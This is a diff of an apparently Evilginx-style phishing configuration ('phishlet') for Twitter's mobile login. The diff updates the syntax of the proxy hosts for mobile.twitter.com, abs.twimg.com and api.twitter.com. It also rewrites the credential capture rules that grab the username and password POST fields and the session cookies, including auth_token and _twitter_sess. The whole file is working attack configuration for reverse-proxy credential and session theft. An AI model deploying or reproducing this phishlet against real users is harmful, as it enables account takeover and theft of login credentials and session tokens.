|
1 | | -name: 'twitter-mobile' |
2 | 1 | author: '@white_fi' |
3 | | -min_ver: '2.0.0' |
| 2 | +min_ver: '2.2.0' |
4 | 3 | proxy_hosts: |
5 | 4 | - {phish_sub: 'mobile', orig_sub: 'mobile', domain: 'twitter.com', session: true, is_landing: true} |
6 | 5 | - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com', session: true, is_landing: false} |
7 | 6 | - {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com', session: false, is_landing: false} |
8 | 7 | sub_filters: |
9 | | - - {hostname: 'mobile.twitter.com', sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} |
10 | | - - {hostname: 'abs.twimg.com', sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} |
11 | | - - {hostname: 'api.twitter.com', sub: 'api', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} |
| 8 | + - {triggers_on: 'mobile.twitter.com', orig_sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} |
| 9 | + - {triggers_on: 'abs.twimg.com', orig_sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} |
| 10 | + - {triggers_on: 'api.twitter.com', orig_sub: 'api', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} |
12 | 11 | auth_tokens: |
13 | 12 | - domain: 'twitter.com' |
14 | 13 | keys: ['dnt','fm','kdt','_twitter_sess','twid','auth_token'] |
15 | | -user_regex: |
16 | | - key: 'session[username_or_email]' |
17 | | - re: '(.*)' |
18 | | -pass_regex: |
19 | | - key: 'session[password]' |
20 | | - re: '(.*)' |
| 14 | +credentials: |
| 15 | + username: |
| 16 | + key: 'session\[username_or_email\]' |
| 17 | + search: '(.*)' |
| 18 | + type: 'post' |
| 19 | + password: |
| 20 | + key: 'session\[password\]' |
| 21 | + search: '(.*)' |
| 22 | + type: 'post' |
21 | 23 | landing_path: |
22 | 24 | - '/login' |
0 commit comments